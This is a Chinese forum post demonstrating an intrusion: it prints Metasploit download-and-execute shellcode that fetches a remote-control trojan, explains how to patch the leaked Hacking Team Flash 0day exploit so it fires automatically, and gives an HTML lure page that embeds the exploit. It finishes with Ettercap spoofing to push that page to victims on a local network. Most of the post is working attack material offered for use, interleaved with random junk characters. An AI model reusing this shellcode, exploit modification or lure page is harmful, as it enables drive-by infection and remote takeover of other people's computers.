找回密码
 立即注册
查看: 1714|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

, r7 S, _! y% |' b& R- _2 u2 Q, w, T 三、flash 0day之手工代码修改制作下载者实例入侵演示 ( u" N6 Y- b- M1 \# a& ~

3 P% r7 V5 t( m. J6 s( ]) Q

$ i( w* }1 T. L2 G) K' m 利用到的工具: . |- h% y/ L) Z1 V5 K

, f9 U; R, N" k7 Q1 x

6 q( {4 V* C8 a7 Y1 M1 j Msf % u" Y1 f) x/ l5 M& e

: y; [8 K/ B4 Z _1 y! d

/ I D& P5 G. r J Ettercap " B4 M4 ?$ [; _9 }: q+ c9 N7 W

; H, T! y7 [4 Z% M3 b$ F! I

8 u, A& x& {% ^( K! C Adobe Flash CS6 n" @+ T" {3 O& ^2 {$ t/ s

$ q P! Z' ~. @: H

* o$ `5 Q6 n4 k0 x- B! P Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 X% |0 J9 z% N, e

0 ?5 r: x4 `- W0 v4 t! S H a* |6 w5 p

/ u/ f, H4 W, N( {; j 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options . c, R' n7 U& L8 H$ ?! x

1 v! v! L6 v3 G o% d

( i# j5 t/ ]$ q$ _6 }! `# g7 P! H& v 如图: ( @4 I# R, F$ y+ L; ]4 R8 n

. s2 ?( L; \( P

- }! X4 I' X& V$ r0 U   # E! \; a2 A2 J6 J) V

. j, \' Y* I' f/ f! U

0 S7 _0 Q z2 A" Z( G$ N   / M1 O* y4 h6 `# C% A' Z

( _0 E- X5 D+ Y( |) x X

) \% I: }- a' m. Q5 G 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: % [6 x4 Y! {2 O0 G, J' c

+ h% t3 d5 z* b2 Y( }

+ e0 _+ d9 d m) N9 Z2 a   9 j z0 W) p' y* u- A

( k$ ]8 e% _" G, k

% a1 Q1 _; ?6 ~" s   - v. r: I$ W3 X N! P

, v0 {/ I/ A8 v4 f! _% K+ a7 l

: |+ u0 i$ Q5 p% v; {: j* g 然后执行generate -t dword生成shellcode,如下: / f4 B" @& l7 w$ k

) z2 b! R6 E/ G% j

! {7 F, M# ]( E0 r+ {   ' z4 ^" v4 {3 l6 }' t" |+ q4 s

7 i. M# F9 W. \# W

( [9 \9 A6 M# d7 } 复制代码到文本下便于我们一会编辑flash exp,如下: + S, B/ q3 m) ~ X+ _& M

- z9 ?$ a1 t/ b3 M2 D, [9 B

5 |* a5 H2 v- E$ ^4 N2 F/ q0 w/ A 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 3 |0 ]1 F2 S: F; ~. s" O, a1 X

/ d/ w. y' |: `- H7 a

4 z# U) O/ z4 E$ o. n 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, : o' M2 \9 N# M3 f+ a& H

) H, t3 W% ?/ i$ y7 V4 P

9 ?1 o7 ]( K4 g% P( c* {: j/ j0 s 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 9 C0 M5 {! ^. b4 v% A

8 D, `" M. ^3 y6 s: X

8 H6 o0 R5 e# ` y2 @ D 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, ' S& k$ {1 [" i- e

1 r7 K* R2 g5 v0 ]* s

0 Q4 I4 ^0 U2 s2 u' g 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, : d. H) c$ u# \1 Z! u- H

) v$ b$ E8 M% Z: Y' z+ Q

" ~/ f8 |- a# c! \7 Y/ K6 Z! V 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, " D$ e$ }: |4 d. d& w

: N# B* B8 e- c& V

' B Y( E" ]3 o; ~5 `0 G+ } 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 8 P- O0 Z) q5 O' m$ B' r

4 g8 {4 W7 e6 j$ u, \- k4 R

8 H, s3 I& Y+ Q) f# g. Z5 p 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, + R' t0 q! Y" F* q, l" I' P6 j1 |. }

- H( }1 b' Y' ~! d, l+ y

, m7 y; Z$ Y2 J2 R2 y5 C0 Q 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, * r6 o3 ]8 `& ?1 f& @' c( L( T J

' b( c/ w) }8 p) r

3 o. K: Z1 a/ ?& p s9 o# T) M, @ 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, ' Z6 h( m: z/ t! K) ]+ u, V

. y( e* g8 o3 Q: c

0 Z l2 P+ n1 Q# W) w/ r* w- i 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 5 y2 f2 ~3 q- ?# U/ O2 ^; G3 `4 E

8 X# Q6 r5 D' S# ~# p y( D. i

6 t4 D9 h6 t0 P5 N' Y6 Y, ?; p; e 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 2 X, V' U* q1 A' u

6 K/ o; C& k" x) ], n; E& L

# _5 a: N4 O( q9 S+ q7 H( a 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, ! D6 _3 ?: m9 ~9 Z0 g2 H. _

/ ~$ f5 F3 q. _' F. G3 t5 x0 H2 G

. K, t5 K7 A1 p- R0 S 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 & P8 V" w5 L* R) [

3 e; @. I1 d2 g/ `

; C6 s3 i2 f+ Q9 `; S8 i   4 _# x4 B* s' g8 c% `

: i1 |" ?; \3 y- q3 V+ d

+ R) W7 F- Q+ o1 X   8 _6 l# q8 @/ s( H' m- O

/ {' q+ A- t, y4 Y

# `3 }. h ?$ I& I9 r4 M 下面我们来修改flash 0day exp,需要修改三个文件,分别为: + n3 x1 o1 E4 J5 N% ^3 e U) Z

0 H& n1 b3 s" H7 C$ q

# t5 O! f5 f& m+ H/ p- F8 c2 n' q9 W" e   , X/ e! j* j1 [* j' L9 e9 H

$ t5 S% w( k" d& e% ~8 t

5 Y6 C4 n+ U$ N 先修改ShellWin32.as,部分源代码如图: * N4 A% m# O8 o

5 G* V' X7 |/ P: r- _

: w) r4 V2 f* h3 i: |   6 Y8 m& t4 {7 B' r' ~

9 b4 v" D1 D1 L+ g/ ~

# V/ |: r: I: A" J' F/ O 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 0 b; w0 }7 t# ~, \( T

* i: R9 M/ M, Q, |$ o% `( s0 h8 }, k

) X9 S, G: F0 b4 }+ Z" ]+ E; R5 r   7 O" B3 m$ x$ h2 l

" M2 H0 l7 z1 q% h! C, Q

! m" n! S: y8 |# G 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: # O# X# \3 R; X3 n. V. H8 @

- x( N2 n$ h: d' c7 m& @

7 n: j. N; k$ U$ P   , y% k5 v6 d. R

. k, h& ?5 `9 l: a: o3 x. D( i

) _, h- _) r8 H+ b& ?8 x2 e 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: " L, T1 n) a- U: K2 Q

1 A7 R2 L. b l$ u4 f: |5 \! Y

* V& q, J! Y- G c. L# K! X, r   + e# _6 J* i# p( N1 a+ t

" f2 q9 {& I3 G& D: e5 @

7 R1 `/ h8 ~9 E. h   " X3 k4 k' Y' E6 H5 A

: w! a2 a" l* Q h/ X# }$ d+ O3 G

: v) R. m5 X3 S) h- |9 ?( B   ( i* w. l9 z5 R- Y0 V1 p' K' t

- c S# g& z8 b, [$ `' a. G) S

) X* e' W# Q- u 然后点保存,下面我们来编译一下,打开 3 l' ?) S" H6 L1 G- H- t

$ |5 H. _. D4 @2 ?

" m' S0 _+ f% ]( C; f exp1.fla然后点文件-发布,看看编译没错误 ' F" M$ x: G Z! P* A. d2 X5 n" ^4 ]

8 ? I5 a) c/ x

% y; L- A4 D' E1 i" [   ) J4 W: v4 r: ?: Z. l( i( L

) M2 o+ q- Y( `: A5 n

9 e' t# C! `0 g; N$ W6 l   3 t. y% E, U; ~- ]$ I, R

- f; H9 X2 Q; t1 M* O0 R; V

6 Q$ ?1 _; x/ I( h& \ y) f4 o   * ?* B. Y1 F p* G) E. j

( `# n7 W3 R) K+ w) d

# `% T' g* A; e   ) Z4 m" ~/ L* h) A5 H M6 r

4 V+ G9 T: V; d/ Z. i, D( r

; o; g I. d$ I6 d' Q$ C& f( k, b 然后我们把生成的 & w: q$ C7 }3 b# \4 ?

" _. b3 {: `6 M! J6 y' k g

' _. o3 Y$ w" V/ Y exp1.swf丢到kailinux /var/www/html下: ' d# F& u, {9 i- [( \! x, D

: z5 I$ C' s7 i# Q* k

7 D3 @* ^5 L$ E. r6 a1 I9 t 然后把这段代码好好编辑一下 7 V: z6 H9 ^& }8 |" s% N5 v

2 s5 n' \8 y; @, ?

1 z+ [* y0 `+ |8 G   9 n- B5 R& p" V `3 G& N# q

* S; R' k) n8 u6 d6 h* k/ F( l

) d) x. E6 _' r1 y   ) M0 H6 F) K: V2 o5 G7 }! k! e1 J

) l2 ]' j3 f. K

' l- o. i( C, _; m% Q   - N1 F0 P. Y5 C; s. w

. e# Q3 ^, J- @' D+ Z$ W9 S: C. c# p

: _0 q; T8 q4 e1 l R8 p# Z   - R8 S& y! G$ C! \+ w

8 A$ F6 q9 G9 D3 H: q+ J

$ B/ j2 n- }( @0 s1 o( n% Z: |/ @   # C/ W" f+ `5 b& l+ x# r" {- k

9 R# U2 f' |) t

& _3 K4 {2 w Q7 i3 y   ) ~/ ~" c6 J9 R

% }& U$ z; P& y2 K: H

6 g! Z2 L, t4 n <!DOCTYPE html> " Y' K* e u4 m8 j2 J- o

7 p9 E: d; X/ b" o; K. T

9 u* |# a( u% \- s/ J8 }$ U' V <html> : E% t. V1 T% i6 M& D

. K8 V# f& s# F1 ~- X' h

. m! `& r6 h' t+ }1 D5 F <head> " S4 p, f- z& H' X2 r

4 o! a; `9 G) ^" k" L' r

- U [; S1 R! r4 G$ r7 V <meta http-equiv="Content-Type" content="text/html; 9 b7 }+ X& J- A" E8 H! J

# A1 [; Q% K3 N0 Q6 c% l! u

& }! |- L J; D$ H& g& m charset=utf-8"/> 0 z; P; F2 L7 k0 h4 c

( {5 a* C& t/ C& K& O7 E H0 L

2 ~" I( \( |2 A* E# Y- E </head> . @) L$ H% @; T8 [/ ^2 Q

* ?9 |7 [) k; c; j7 g, V

7 M4 Z8 Q( g* O8 U <body> 5 P8 n0 A* c1 M4 |7 I

* n; _, k* H1 A( f

* R2 J6 b, G+ N3 Z3 [ <h2> Please wait, the requested page is loading...</h2> ( |! O& D& e+ U: U" _! ?2 M, s4 P

% A/ _) G+ ?* s. {

& c. G8 i2 `: x0 ?/ W8 G7 A <br> ( ~ u4 O. n* a0 a& K6 E0 I

8 g6 U" V! b1 d% v1 ]

A$ D, _9 \, s, X! q <OBJECT * J% p- h& b$ |+ N

" S& R5 d0 S1 q1 k8 Q# l3 G

! t, f/ ?2 j& g( K! x R classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie # \* b" O, I0 i, ^$ G+ O

6 d8 \; z* |5 H' t4 ?

' y/ V- w0 \" A: _% l! e8 t' N( k d VALUE="http://192.168.0.109/exp1.swf"></OBJECT> ( G1 \; ]' S& t$ F3 _* [

4 e, c0 u9 u, _6 w5 T/ W7 i

& G1 C4 C. ^1 V7 ]1 A </body> " X- z. J4 M. w1 _7 a# y/ j+ _

( |; @. r3 Y$ `& p9 v/ [5 Z

6 v8 b) U v- K# O; M. x; M0 T. P <script> $ W; E* G9 r3 X! ]; m

/ P' A/ T! z7 M8 T

, Z5 e2 x0 {/ I4 y2 @     setTimeout(function () { + Z, W6 Z" t7 |6 [4 u

- _8 B- b3 H7 ?5 _$ \, C- x

4 O) |0 g5 X! Y. A1 @          1 a# A8 l, A9 E( O1 p+ {; E

& w( ~3 t" {) i+ v

2 M, ]) |& G% q K( c window.location.reload(); : k+ ]) ^. J( }0 Q0 g( q4 b

$ P* k' P& p: X1 |- U

4 F7 O) W" r- a, o: ]/ ~     }, 10000); ( X; V5 R1 d- f9 T+ w

! C ~$ g8 ]- f, z

2 ]* t9 Z4 r% L D1 Y/ }: B   4 x& G, o- |5 f; H# x

0 J" E' P6 n6 i

7 R2 ~8 q5 s& R/ J Z </script> + \9 j3 m$ v# q8 K! e

i6 d$ f- i7 B; j, S

" d6 S3 J5 X$ u: b) E6 H9 N </html> ( V& U e+ Y; h/ T' s4 `

( X! Z( J! s; L

k4 i: _% @0 i. k9 r% {   ! J& i# _; I! _% y2 K

; O5 U+ a, T% O3 c& A. Y5 p1 N1 e

t( q5 t B. d5 w! i! q, O) g4 B 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: : Q( h) s! _/ B8 k1 D& ^, P

3 {5 P I5 i* H8 O& s

% W' d: r4 A$ i i/ s& B   9 \" O1 p/ M- a/ x

: A @, o' M" q- C% b2 O

3 S( {$ U; N& _8 m" s0 b' u3 D   . D# P" f7 T5 y6 c/ f* B

- X; g: z$ K5 O" G% U% o& [

: c% d1 v/ l2 N% F5 V' a* U   ( e+ @' o* x5 y9 D; A, t

; n' a1 ?2 J! A# f1 e

% q `& G1 }0 }4 c/ L m# K( d8 o* I   H) w' q( w' q6 h

6 ]; n6 j+ b$ S2 y$ Z

$ O& H# u4 ]8 E, b   7 n' A' l4 b! z! J- D3 Y9 c/ a

5 y) @# F+ o; N2 a6 a$ Y! ^

4 s C. i _3 H3 _) V 下面我们用ettercap欺骗如图: 2 K0 P8 V$ I; h7 T% B) ]

/ N9 x1 _' c7 Y* v

8 A# l% b; w7 Y9 ^0 P" n5 H   ; `" P% t* @9 g

2 {4 D7 q- a- }0 [) [5 S! i6 z" d4 M

/ ~+ [/ r; Z A$ w! i- d/ I   5 L1 U Z2 B9 @" }4 Q6 I

5 Q2 v; e$ e; H; S+ x5 `, S

% f& J: [( f; L0 B4 V, _- a" S 下面我们随便访问个网站看看: $ \3 D) g! E5 x5 j% Q

8 w5 _( a8 N. z" q' w- p5 g

6 `, b6 E2 i. d( C8 K* z 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 2 N0 y" }, ?- j" A# W/ t; Q2 p

3 B8 i( N( z. x) d0 q2 m

% l! w5 n$ [3 N% R' D6 g( w- o   0 `$ v# S0 K3 E1 m* \' ^( |* I% E/ X

! @4 M& }2 D2 C, \8 S

: Z: j1 c/ |7 U j 我们看另一台, 4 [# X3 f2 U w

6 o+ V/ [8 `2 |8 K$ Z) ^% Y

* I7 D1 _3 _, W. s* [ 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 4 H6 c9 A) F7 r9 K2 @

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表